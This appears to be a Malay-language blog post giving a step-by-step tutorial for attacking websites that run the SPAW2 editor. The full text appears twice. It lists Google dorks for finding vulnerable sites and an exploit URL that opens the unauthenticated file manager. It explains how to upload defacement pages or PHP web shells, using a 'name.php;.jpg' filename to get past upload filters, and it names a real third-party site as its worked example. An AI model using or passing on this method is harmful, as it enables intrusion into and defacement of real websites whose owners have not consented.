Dork:
inurl:"spaw2/dialogs/"
inurl:"spaw2/uploads/files/"
Exploit:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9&type=files
1. Guna dork di atas utk mencari website yg vulnerable dgn teknik ni..2. Korang akan jumpa mcam ni
"Index of/ spaw2/dialogs/"
atau
"site.com/abc/spaw2/uploads/files/aaaa/aaaa.pdf"
3. Sekarang tukar spaw2/uploads/files/aaaa/aaaa.pdf dengan exploitnya.. spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9&type=files
4. Lepas tuh, bleh la korang nk upload deface page or shell korang..
Contoh:
selepas guna dork tuh, aku jumpa website ni
http://kasht.com.ua/spaw2/dialogs/
aku nak upload aku punya file, aku tukar je la url tuh jadi mcam ni
http://kasht.com.ua/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da752d9%208cac9&type=files
kalau korang nk upload deface page, klik dkat box atas tuh & pilih files..
lpas tuh upload la deface page korang..
direktori deface page korang kat sini
http://kasht.com.ua/spaw2/uploads/files/namefilekorang.html
kalau korang nk upload shell atau petronas, rename biar dia jadi mcam ni
nameshellataupetronas.php;.jpg
pastu kat box atas tuh korang pilih images
dan shell korang akan ade kat sini
http://kasht.com.ua/spaw2/uploads/images/nameshellataupetronas.php;.jpg
itu saja la tutorial utk hari ni..harap2 korang faham yer..
inurl:"spaw2/dialogs/"
inurl:"spaw2/uploads/files/"
Exploit:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9&type=files
1. Guna dork di atas utk mencari website yg vulnerable dgn teknik ni..2. Korang akan jumpa mcam ni
"Index of/ spaw2/dialogs/"
atau
"site.com/abc/spaw2/uploads/files/aaaa/aaaa.pdf"
3. Sekarang tukar spaw2/uploads/files/aaaa/aaaa.pdf dengan exploitnya.. spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9&type=files
4. Lepas tuh, bleh la korang nk upload deface page or shell korang..
Contoh:
selepas guna dork tuh, aku jumpa website ni
http://kasht.com.ua/spaw2/dialogs/
aku nak upload aku punya file, aku tukar je la url tuh jadi mcam ni
http://kasht.com.ua/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da752d9%208cac9&type=files
kalau korang nk upload deface page, klik dkat box atas tuh & pilih files..
lpas tuh upload la deface page korang..
direktori deface page korang kat sini
http://kasht.com.ua/spaw2/uploads/files/namefilekorang.html
kalau korang nk upload shell atau petronas, rename biar dia jadi mcam ni
nameshellataupetronas.php;.jpg
pastu kat box atas tuh korang pilih images
dan shell korang akan ade kat sini
http://kasht.com.ua/spaw2/uploads/images/nameshellataupetronas.php;.jpg
itu saja la tutorial utk hari ni..harap2 korang faham yer..
Facebook
No comments:
Post a Comment